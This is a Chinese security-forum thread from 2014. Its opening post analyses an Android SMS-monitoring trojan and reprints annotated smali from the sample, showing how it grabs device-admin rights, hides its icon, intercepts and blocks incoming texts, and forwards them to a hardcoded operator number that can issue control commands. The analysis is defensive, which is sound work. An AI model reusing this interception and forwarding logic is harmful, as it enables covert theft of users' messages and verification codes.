吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 39134|回复: 82
收起左侧

[移动样本分析] 短信监控木马“我的相册”分析

  [复制链接]
h_one 发表于 2014-8-8 20:04
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
【木马名称】: 我的相册
【包名】:sada.rlnihao.testrlnihao
【分析工具】: APK改之理
【反编译】: 在dex中插入无效代码在一从来不调用的类上,造成无法二次打包和无法转化成java代码
【木马特点】: 监听截获收件信息,并可控制手机








随着移动互联网的迅速兴起,手机移动支付呈现井喷式发展。然而移动支付在便利人们生活的同时,也面临着越来越多的风险。近日xxshenqi出现,算是又给android移动安全又掀起风波。我想接下来一段时间将会有大量的类似xxshenqi的变种,这也给我们带来挑战和学习机会,同时带来的好处就是给小白用户做了个提醒,让他们感觉到自己的手机是需要保护。前天晚上在某一qq群里,冒出一个名叫“我的相册”,第一反应这就是一个马儿,当然若是一个马儿能找到它的源头是最好的,如电话号码或邮箱信息等,使用apk改之理进行反编译,发现没法转java代码,那就看smali吧,在二次打包时发现


1.png
原来是因为在无用类中插入了无效字节码使逆向工具无能,由于大部分逆向工具都是线性读取字节码并解析的,当遇到无效字节是,就会引起反汇编工具字节码解析失败。我去又遇到这个问题,真不知道怎么去处理,先看smali分析吧



代码树形结构:                                                                                        木马整个的运作流程:
2.jpg                                                                                                                   3.jpg

详细分析:
首先我们查看他的AndroidManifest文件,查看它具有哪些权限,和它的入口在哪
4.jpg
理清了他的能力和入口接下来我们就依依来分析

入口一MainActivity分析
启动SmsServer,调用ShareUtil.getFlag()获取Flag是否为”true”并且调用SmsUtil.compareDate()判断当前的时间否是”2014.8.31之后,就通过短信发送” Install Success!”给木马作者.    看来这是一变种木马啊,还很新的。
[Asm] 纯文本查看 复制代码
    invoke-direct {v1}, Landroid/content/Intent;-><init>()V
#Intent intent2 = new Intent();
    .line 22
    .local v1, "intent2":Landroid/content/Intent;
    invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getApplicationContext()Landroid/content/Context;

    move-result-object v5
#Content v5 = this.getApplicationContext();
    const-class v6, Lsada/nihao/testnihao/SmsService;

    invoke-virtual {v1, v5, v6}, Landroid/content/Intent;->setClass(Landroid/content/Context;Ljava/lang/Class;)Landroid/content/Intent;
#intent2.setClass(getApplicationContext(), SmsService.class);

    .line 23
    invoke-virtual {p0, v1}, Lsada/nihao/testnihao/MainActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
#MainActivity.startService(intent2);
    .line 26
    :try_start_0
    invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getApplicationContext()Landroid/content/Context;

    move-result-object v5

    invoke-static {v5}, Lsada/nihao/testnihao/ShareUtil;->getInstance(Landroid/content/Context;)Lsada/nihao/testnihao/ShareUtil;

    move-result-object v4
#ShareUtil su = ShareUtil.getInstance(getApplicationContext());
    .line 27
    .local v4, "su":Lsada/nihao/testnihao/ShareUtil;
    const-string v5, ""

    invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getFlag()Ljava/lang/String;

    move-result-object v6
#String strFlag = su.getFlag(); 判断Flag 是否为“”;
    invoke-virtual {v5, v6}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v5
#若flag不是“” 跳到cond_1标签执行
    if-eqz v5, :cond_1

    .line 28
    invoke-static {}, Lsada/nihao/testnihao/SmsUtil;->compareDate()Z
#调用SmsUtil.compareDate() 判断当前时间是不是在"2014-08-31 23:00:00"之前
    move-result v5


检测LockRec组件是否具有系统权限,若不是则将LockRec组件注册成系统管理员权限,然后调用 PackageManager().setCompoentEnabledSetting(getComponentName(),2,1);隐藏图标


[Asm] 纯文本查看 复制代码
    const-string v5, "device_policy"

    invoke-virtual {p0, v5}, Lsada/nihao/testnihao/MainActivity;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;

    move-result-object v5

    check-cast v5, Landroid/app/admin/DevicePolicyManager;
#DevicePolicyManager这是设备管理主类,通过他可以实现屏幕锁定,屏幕亮度调节,出厂设置等功能
    iput-object v5, p0, Lsada/nihao/testnihao/MainActivity;->policyManager:Landroid/app/admin/DevicePolicyManager;
#获取安全管理服务  this.policyManager = this.getSystemService("device_police");
    .line 38
    new-instance v5, Landroid/content/ComponentName;

    const-class v6, Lsada/nihao/testnihao/LockRec;

    invoke-direct {v5, p0, v6}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
#ComponentName com = new ComponentName(this.content, LockRec.class);
    iput-object v5, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
#this.componentName = com;
    .line 39
    iget-object v5, p0, Lsada/nihao/testnihao/MainActivity;->policyManager:Landroid/app/admin/DevicePolicyManager;
#DevicePolicyManager v5 = this.policyManager;
    iget-object v6, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
#ComponentName v6 = this.componentName;
    invoke-virtual {v5, v6}, Landroid/app/admin/DevicePolicyManager;->isAdminActive(Landroid/content/ComponentName;)Z
#boolean bret = v5.isAdminActive(v6);   // 判断LockRec组件是否有系统管理员的权限
    move-result v5

    if-nez v5, :cond_2
#跳向cond_2标签,表示LockRec组件已经具备系统管理员权限的

########################################################################################################################
	#接下来将LockRec组件添加系统管理员权限
    .line 41
    new-instance v2, Landroid/content/Intent;

    const-string v5, "android.app.action.ADD_DEVICE_ADMIN"

    invoke-direct {v2, v5}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V


#Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    .line 42
    .local v2, "localIntent":Landroid/content/Intent;
    const-string v5, "android.app.extra.DEVICE_ADMIN"

    iget-object v6, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;

    invoke-virtual {v2, v5, v6}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;
#指定给LockRec组件授予系统权限 localIntent.putExtra("android.app.extra.DEVICE_ADMIN", componentName);
    .line 43
    const-string v5, "android.app.extra.ADD_EXPLANATION"

    const-string v6, "\u8bbe\u5907\u7ba1\u7406\u5668"
#String v6 = "设备管理器"
    invoke-virtual {v2, v5, v6}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;

    .line 44
    invoke-virtual {p0, v2}, Lsada/nihao/testnihao/MainActivity;->startActivity(Landroid/content/Intent;)V
#this.startActivity(localIntent);
    .line 51
    .end local v2    # "localIntent":Landroid/content/Intent;
    :cond_2
    invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getPackageManager()Landroid/content/pm/PackageManager;

    move-result-object v3
#PackageManager p = this.getPackManager();
    .line 52
    .local v3, "p":Landroid/content/pm/PackageManager;
    invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getComponentName()Landroid/content/ComponentName;

    move-result-object v5
#ComponentName v5 = getComponentName();
    const/4 v6, 0x2

    const/4 v7, 0x1

    invoke-virtual {v3, v5, v6, v7}, Landroid/content/pm/PackageManager;->setComponentEnabledSetting(Landroid/content/ComponentName;II)V
#隐藏图标 PackageManager().setCompoentEnabledSetting(getComponentName(),2,1);
    .line 53
    invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->finish()V


LockRec是神马东西喃? 我们可以进入AndroidManifest.xml文件查看
[Asm] 纯文本查看 复制代码
<!--屏幕锁屏或出厂设置,密码更换Recevice 可以通过查看android:resource指定的xml文件查看-->
        <receiver android:description="@string/str" android:label="System 设备管理器" android:name="sada.nihao.testnihao.LockRec" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/lock_screen"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>

其实这就是为了调用DevicePolicyManager  设备安全管理服务去干事,具体干什么是,我们可以通过上面代码中 android:resource标签指定的lock_screen文件查看:
[Asm] 纯文本查看 复制代码
<?xml version="1.0" encoding="utf-8"?>
<device-admin
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-policies>
<--!force-lock设备自动锁屏-->
        <force-lock />
    </uses-policies>
</device-admin>

原来木马要干锁屏的事

入口二监听自启动广播
启动了一个名叫"WatchDogService"服务
[Asm] 纯文本查看 复制代码
    new-instance v0, Landroid/content/Intent;

    const-class v1, Lsada/nihao/testnihao/SmsService;

    invoke-direct {v0, p1, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V

    .line 15
    .local v0, "WatchDogService":Landroid/content/Intent;
    const/high16 v1, 0x10000000

    invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;

    .line 16
    invoke-virtual {p1, v0}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;


服务入口函数OnCreate()
1.注册SmsObServer类,它是继承ContentObServer类,目的是观察特定Uri引起的数据库变化,这个木马对短信收件箱做了监视.
[Asm] 纯文本查看 复制代码
    .line 27
    invoke-virtual {p0}, Lsada/nihao/testnihao/SmsService;->getContentResolver()Landroid/content/ContentResolver;

    move-result-object v1

    .line 28
    .local v1, "resolver":Landroid/content/ContentResolver;
    new-instance v2, Lsada/nihao/testnihao/SmsObserver;
#resolver = this.getContentResolver(); 获取内容解析器
    invoke-virtual {p0}, Lsada/nihao/testnihao/SmsService;->getApplicationContext()Landroid/content/Context;

    move-result-object v3

    new-instance v4, Lsada/nihao/testnihao/SmsHandler;

    invoke-direct {v4, p0}, Lsada/nihao/testnihao/SmsHandler;-><init>(Landroid/content/Context;)V

    invoke-direct {v2, v3, v1, v4}, Lsada/nihao/testnihao/SmsObserver;-><init>(Landroid/content/Context;Landroid/content/ContentResolver;Lsada/nihao/testnihao/SmsHandler;)V

    iput-object v2, p0, Lsada/nihao/testnihao/SmsService;->mObserver:Lsada/nihao/testnihao/SmsObserver;

    .line 29
    const-string v2, "content://sms"

    invoke-static {v2}, Landroid/net/Uri;->parse(Ljava/lang/String;)Landroid/net/Uri;
#Uri uri = Uri.parse("content://sms");
    move-result-object v2

    const/4 v3, 0x1

    iget-object v4, p0, Lsada/nihao/testnihao/SmsService;->mObserver:Lsada/nihao/testnihao/SmsObserver;

    invoke-virtual {v1, v2, v3, v4}, Landroid/content/ContentResolver;->registerContentObserver(Landroid/net/Uri;ZLandroid/database/ContentObserver;)V
#注册观察者类,监听短信数据库变化
#resolver.registerContentObserver(uri, ture, new SmsObserver(getApplictionContext(), resolver, new SmsHandler(this)));

2.动态注册smsReciver,并设置最大全权限,这样即使手机中存在安全软件,在重启手机后也有可能第一时间拿到短信
[Asm] 纯文本查看 复制代码
   new-instance v2, Lsada/nihao/testnihao/SmsReceiver;

    invoke-direct {v2}, Lsada/nihao/testnihao/SmsReceiver;-><init>()V
	
##########################################################################################################################
#动态注册短信SmsReciver广播包  
#SmsReceiver smsRec = new SmsReceiver();
    iput-object v2, p0, Lsada/nihao/testnihao/SmsService;->smsReceiver:Lsada/nihao/testnihao/SmsReceiver;

    .line 32
    new-instance v0, Landroid/content/IntentFilter;

    const-string v2, "android.provider.Telephony.SMS_RECEIVED"
#拦截短信事件
    invoke-direct {v0, v2}, Landroid/content/IntentFilter;-><init>(Ljava/lang/String;)V
#IntentFilter intentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");

    .line 33
    .local v0, "intentFilter":Landroid/content/IntentFilter;
    const v2, 0x7fffffff

    invoke-virtual {v0, v2}, Landroid/content/IntentFilter;->setPriority(I)V
#intentFilter.setPriority(0x7FFFFFFF);

    .line 34
    iget-object v2, p0, Lsada/nihao/testnihao/SmsService;->smsReceiver:Lsada/nihao/testnihao/SmsReceiver;
#SmsReceiver v2 = SmsService.smsReceiver;
    new-instance v3, Landroid/content/IntentFilter;

    const-string v4, "android.provider.Telephony.SMS_RECEIVED"

    invoke-direct {v3, v4}, Landroid/content/IntentFilter;-><init>(Ljava/lang/String;)V
#IntentFilter intentFilter2 = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
    invoke-virtual {p0, v2, v3}, Lsada/nihao/testnihao/SmsService;->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)Landroid/content/Intent;

	#SmsService.registerReceiver(SmsService.smsReceiver, intentFilter2);
#动态注册监听程序自启动的广播包,并调用setPriority()将该广播包设置为最大权限,
    .line 35
    return-void
.end method


此时以注册对收件箱的监控,当有消息发送到中码者手机,或者是木马操控者发送的,将会触发SmsObServer类中的OnChange调用
获取指定短信列值,并将封装成Message 然后触发SmsHandler

[Asm] 纯文本查看 复制代码
    const-string v4, "read=?"
# 需要取得的咧
# String[] PROJECTION= {"_id","address","read","body","thread_id"};
    const/4 v5, 0x1

    new-array v5, v5, [Ljava/lang/String;

    const/4 v6, 0x0

    const-string v16, "0"

    aput-object v16, v5, v6

    const-string v6, "date desc"

    invoke-virtual/range {v1 .. v6}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;
#获取指定列值的收件箱类容
#Cursor mCursor = resolver.query(Uri.parse("content://sms/inbox"), PROJECTION, "read=?", null, "date desc");
    move-result-object v11

    .line 32
    .local v11, "mCursor":Landroid/database/Cursor;
    if-nez v11, :cond_8
#if(mCursor != null)
    .line 88
    :cond_0
    :goto_0
    return-void

    .line 40
    :cond_1
    new-instance v8, Lsada/nihao/testnihao/SmsInfo;

    invoke-direct {v8}, Lsada/nihao/testnihao/SmsInfo;-><init>()V
#SmsInfo _smsInfo = new SmsInfo();
    .line 42
    .local v8, "_smsInfo":Lsada/nihao/testnihao/SmsInfo;
    const-string v1, "_id"
#int _inIndex = mCursor.getColumnIndex("_id");
    invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I

    move-result v7

    .line 43
    .local v7, "_inIndex":I
    const/4 v1, -0x1

    if-eq v7, v1, :cond_2

    .line 45
    invoke-interface {v11, v7}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;

    move-result-object v1
#SmsInfo.id = mCursor.getString(mCursor.getColumnIndex("_id"));
    iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->_id:Ljava/lang/String;

    .line 48
    :cond_2
    const-string v1, "thread_id"

    invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I

    move-result v15

    .line 49
    .local v15, "thread_idIndex":I
    const/4 v1, -0x1

    if-eq v15, v1, :cond_3

    .line 51
    invoke-interface {v11, v15}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;

    move-result-object v1
#Smsinfo.thread_id = mCursor.getString(mCursor.getColumnIndex("thread_id"));
    iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->thread_id:Ljava/lang/String;

    .line 54
    :cond_3
    const-string v1, "address"

    invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I

    move-result v9

    .line 55
    .local v9, "addressIndex":I
    const/4 v1, -0x1

    if-eq v9, v1, :cond_4

    .line 57
    invoke-interface {v11, v9}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;

    move-result-object v1

    iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#Smsinfo.smsAddress = mCursor.getString(mCursor.getColumnIndex("address"));
    .line 60
    :cond_4
    const-string v1, "body"

    invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I

    move-result v10

    .line 61
    .local v10, "bodyIndex":I
    const/4 v1, -0x1

    if-eq v10, v1, :cond_5

    .line 63
    invoke-interface {v11, v10}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;

    move-result-object v1

    iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
#Smsinfo.smsBody = mCursor.getString(mCursor.getColumnIndex("body"));
    .line 66
    :cond_5
    const-string v1, "read"

    invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I

    move-result v13

    .line 67
    .local v13, "readIndex":I
    const/4 v1, -0x1

    if-eq v13, v1, :cond_6

    .line 69
    invoke-interface {v11, v13}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;

    move-result-object v1

    iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->read:Ljava/lang/String;
#Smsinfo.read = mCursor.getString(mCursor.getColumnIndex("read"));
    .line 71
    :cond_6
    move-object/from16 v0, p0

    iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->smsHandler:Lsada/nihao/testnihao/SmsHandler;
#封装获取到的短信信息 通知Handler
    invoke-virtual {v1}, Lsada/nihao/testnihao/SmsHandler;->obtainMessage()Landroid/os/Message;

    move-result-object v12

    .line 72
    .local v12, "msg":Landroid/os/Message;
    move-object/from16 v0, p0
#Message msg = new Message();
    iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->mContext:Landroid/content/Context;

    invoke-static {v1}, Lsada/nihao/testnihao/ShareUtil;->getInstance(Landroid/content/Context;)Lsada/nihao/testnihao/ShareUtil;

    move-result-object v14

    .line 73
    .local v14, "su":Lsada/nihao/testnihao/ShareUtil;
    const-string v1, "1"
#ShareUtil su = ShareUtil.getInstance(this.mContext);
    invoke-virtual {v14}, Lsada/nihao/testnihao/ShareUtil;->getSwitch()Ljava/lang/String;

    move-result-object v2

    invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v1

    if-nez v1, :cond_7

    iget-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#获取是谁发过来的
    invoke-virtual {v14}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;

    move-result-object v2

    invoke-virtual {v1, v2}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z

    move-result v1

    if-eqz v1, :cond_9

    .line 74
    :cond_7
    const/4 v1, 0x2

    iput v1, v8, Lsada/nihao/testnihao/SmsInfo;->action:I

    .line 78
    :goto_1
    iput-object v8, v12, Landroid/os/Message;->obj:Ljava/lang/Object;
#msg.obj = item;
    .line 79
    move-object/from16 v0, p0

    iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->smsHandler:Lsada/nihao/testnihao/SmsHandler;
#mHandler.sendMessage(msg);; 触发hander处理偷取的收件箱信息
    invoke-virtual {v1, v12}, Lsada/nihao/testnihao/SmsHandler;->sendMessage(Landroid/os/Message;)Z


在SmsHandler类中
1.判断发送者是否是木马作者的手机号,如是进入控制手机流程
2.普通号码发送的,将其短信装给自己

[Asm] 纯文本查看 复制代码
  .line 41
    .local v4, "su":Lsada/nihao/testnihao/ShareUtil;
    :try_start_0
    invoke-static {}, Lsada/nihao/testnihao/SmsUtil;->compareDate()Z

    move-result v6

    if-nez v6, :cond_0

    .line 42
    iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#String v6 = SmsInfo.smsAddress; 获取发信者手机号码
    invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
#木马作者 手机号码
    move-result-object v7

    invoke-virtual {v6, v7}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
#判断本次接收到的短信是不是木马编写者
    move-result v6
#v6 不为零表示木马作者发送的,这样就达到控制手机的目的
    if-eqz v6, :cond_2
###########################################################################################################################################################################
#木马作者控制手机部分代码分析
	.line 43
    new-instance v2, Lsada/nihao/testnihao/SMSEntity;

    invoke-direct {v2}, Lsada/nihao/testnihao/SMSEntity;-><init>()V
#SMSEntity sms = new SMSEntity();
    .line 44
    .local v2, "sms":Lsada/nihao/testnihao/SMSEntity;
    iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;

    iput-object v6, v2, Lsada/nihao/testnihao/SMSEntity;->smsTitle:Ljava/lang/String;
#sms.smsTitle = SmsInfo.smsAddress;
    .line 45
    iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;

    iput-object v6, v2, Lsada/nihao/testnihao/SMSEntity;->smsContent:Ljava/lang/String;
#sms.smsContent = SmsInfo.smsBody;
    .line 46
    iget-object v6, p0, Lsada/nihao/testnihao/SmsHandler;->mcontext:Landroid/content/Context;

    invoke-static {v6, v2}, Lsada/nihao/testnihao/SmsUtil;->parseStr(Landroid/content/Context;Lsada/nihao/testnihao/SMSEntity;)V
#SmsUtil.parseStr(this,mcontext, sms); 
    :try_end_0
    .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_
   invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getSwitch()Ljava/lang/String;

    move-result-object v7

    invoke-virtual {v6, v7}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z

    move-result v6

    if-eqz v6, :cond_0

    .line 49
    const-string v6, "\u6570\u636e\u5e93\u53d1\u9001"
#数据库发送
    const-string v7, ""
#将用户接收到的短信转发给木马作者
    invoke-static {v6, v7}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I

    .line 50
    iget-object v6, p0, Lsada/nihao/testnihao/SmsHandler;->mcontext:Landroid/content/Context;

    invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;

    move-result-object v7

    invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone1()Ljava/lang/String;

    move-result-object v8

    new-instance v9, Ljava/lang/StringBuilder;

    iget-object v10, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;

    invoke-static {v10}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;

    move-result-object v10

    invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V

    iget-object v10, v3, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;

    invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v9

    invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v9

    invoke-static {v6, v7, v8, v9}, Lsada/nihao/testnihao/SmsUtil;->sendSMS(Landroid/content/Context;Lj


木马作者的信息以及短息指令的抽取,是封装在Const类里面的
[Asm] 纯文本查看 复制代码
    const/4 v1, 0x0

[b]    const-string v2, "13601574293"[/b]

    aput-object v2, v0, v1
#String v0[0] = "13601574293";
    const/4 v1, 0x1

    const-string v2, ""

    aput-object v2, v0, v1
#String v0[1] = "";
    sput-object v0, Lsada/nihao/testnihao/Const;->nums:[Ljava/lang/String;
#Const.nums = v0;
    .line 108
    const-string v0, "#T"

    sput-object v0, Lsada/nihao/testnihao/Const;->transpond:Ljava/lang/String;
#Const.transpond =  "#T" 
    .line 109
    const-string v0, "#S"

    sput-object v0, Lsada/nihao/testnihao/Const;->switch1:Ljava/lang/String;
#Const.transpond = "#S";
    .line 110
    const-string v0, "#C"

    sput-object v0, Lsada/nihao/testnihao/Const;->change:Ljava/lang/String;

    .line 111
    const-string v0, "SHA_PRE"

    sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PRE:Ljava/lang/String;
#Const.SHA_PRE = "SHA_PRE";
    .line 112
    const-string v0, "SHARE_FLAG"

    sput-object v0, Lsada/nihao/testnihao/Const;->SHA_FLAG:Ljava/lang/String;
#Const.SHA_FLAG = "SHARE_FLAG";
    .line 113
    const-string v0, "SHA_PHO"

    sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PHO:Ljava/lang/String;

    .line 114
    const-string v0, "SHARE_PHONE1"

    sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PHONE1:Ljava/lang/String;

    .line 115
    const-string v0, "SHARE_SWITCH"

    sput-object v0, Lsada/nihao/testnihao/Const;->SHA_SWITCH:Ljava/lang/String;

    return-void


入口三短信广播监听
[Asm] 纯文本查看 复制代码
    .line 28
    invoke-virtual {p0}, Lsada/nihao/testnihao/SmsReceiver;->abortBroadcast()V
#SmsReceiver.abortBroadcast()截断短信广播包往下流
    .line 29
    invoke-static {p1, v1}, Lsada/nihao/testnihao/SmsUtil;->parseStr(Landroid/content/Context;Lsada/nihao/testnihao/SMSEntity;)V
#进入SmsUtil类的paresStr函数,会对短信发送者进行识别。

   .line 33
    invoke-virtual {v2}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;

    move-result-object v3

    invoke-virtual {v2}, Lsada/nihao/testnihao/ShareUtil;->getPhone1()Ljava/lang/String;

    move-result-object v4

    new-instance v5, Ljava/lang/StringBuilder;

    iget-object v6, v1, Lsada/nihao/testnihao/SMSEntity;->smsTitle:Ljava/lang/String;

    invoke-static {v6}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;

    move-result-object v6

    invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V

    iget-object v6, v1, Lsada/nihao/testnihao/SMSEntity;->smsContent:Ljava/lang/String;

    invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v5

    invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v5
将短信转给木马作者
    invoke-static {p1, v3, v4, v5}, Lsada/nihao/testnihao/SmsUtil;->sendSMS(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Lja

从三个入口算是比较清楚的把这个木马搞定了,可是通过在无用类中插入无效字节码使逆向工具无能,这种手法小菜真的不知如何应对,还望和大家交流学习
测试发现360手机卫士和腾讯管家可以准确查杀,而百度手机卫士还不能查杀.................

点评

又一轮的呼死你可以开始了吗 --13601574293  发表于 2014-9-21 20:27
膜拜大牛  发表于 2014-8-26 18:48

免费评分

参与人数 2热心值 +2 收起 理由
tianqingji + 1 感谢发布原创作品,吾爱破解论坛因你更精彩.
闹够了没有 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

oyefer 发表于 2014-8-25 15:07
看来安卓系统的木马会越来越多,越来越隐藏。。
amscracker 发表于 2014-8-8 20:08
358463121 发表于 2014-8-8 20:19
william2568 发表于 2014-8-8 20:19
问一个问题,有时候会遇到像帖子中提到的问题,可以反编译,但是不能回编译,这种应该怎么解决呢
gzrheheyixiao 发表于 2014-8-8 20:19
又见证了一个大牛的诞生!
laoxing 发表于 2014-8-8 20:24
辛苦了楼主
 楼主| h_one 发表于 2014-8-8 22:57
amscracker 发表于 2014-8-8 20:08
大牛就是大牛膜拜中!

相互学习{:1_912:}
 楼主| h_one 发表于 2014-8-8 22:58
358463121 发表于 2014-8-8 20:19
好像现在的手机病毒都是要root的

为何啊,这个不需要。
 楼主| h_one 发表于 2014-8-8 23:01
william2568 发表于 2014-8-8 20:19
问一个问题,有时候会遇到像帖子中提到的问题,可以反编译,但是不能回编译,这种应该怎么解决呢

分很多种情况,这个木马用到的技术是在无用类中插入无效字节码,占时还没有研究出
william2568 发表于 2014-8-9 08:27
zxcfvasd 发表于 2014-8-8 23:01
分很多种情况,这个木马用到的技术是在无用类中插入无效字节码,占时还没有研究出

谢谢回答
有时候别人反编译之后,进行内购破解,然后回编译,整个过程十分流畅
我对同一个apk进行反编译,能成功,但是回编译却失败了
如果是插入了无效字节,那应该不止我一个人失败啊……
失败时的提示也正如文中所说的 exception in thread "main"……之类的
写了这么多,希望大神能指教一下
麻烦了,再次感谢!
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-19 15:00

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表